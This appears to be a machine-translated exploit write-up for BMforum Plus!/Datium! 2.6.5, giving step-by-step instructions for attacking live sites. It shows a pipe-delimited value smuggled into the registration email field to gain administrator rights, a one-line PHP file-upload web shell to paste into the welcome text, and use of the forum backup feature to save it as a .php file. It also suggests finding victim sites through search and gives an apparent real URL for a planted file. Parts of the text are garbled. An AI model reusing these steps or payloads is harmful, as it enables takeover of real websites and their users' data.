BMF-improved privilege!
! Author: ezboy Source: Firefox www.wrsky.comBMF- elevation of privilege vulnerability is the main tour event of the registered members, some of the information does not filter | this symbol !! And this Forums Members archive format XXX | XXXX | XXXX | Use | As a district email, this field is just not filtered to submit Test@test.com|000 | 000 | 000 | 000 | 00 | 0 | 00 | | 0 | This format can be more than the administrator's registration format, found that the 19th is 0 is administrator !!! After the registration is completed, it is found to be an administrator !! ------------- ----- You can add Trojans in the announcement, then use the forum backup into a PHP file !!! .... End
Utilization process:
Affected version:
BMforum Plus! 2.6.5 New Year Edition BMforum Datium! 2.6.5 New Year Edition
Search in the Baidu, choose one, just choose one, enter the registered user page:
Filter incomplete attacks using the registration option.
Mail option fill in the format:
TEST@test.com | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
Register a user eztest, password: eztest, Mail format as above
Log in, click the management center, with the user and password above to enter the management rear interface.
Management page: adminIndex.php
The text of the registered welcome section information is entered;
'; COPY ($ _ files [mf] [tmp_name], $ _ files [mf] [name])?>
Forum backup:
Select the backup welcome information file, all others go
The specified backup directory is:
Backup path:
The Face / 222 Other directory is required.
Complete route:
http://saiy.77yan.com/wrsky/face/222/other/welcome.php
PHPCL.htm
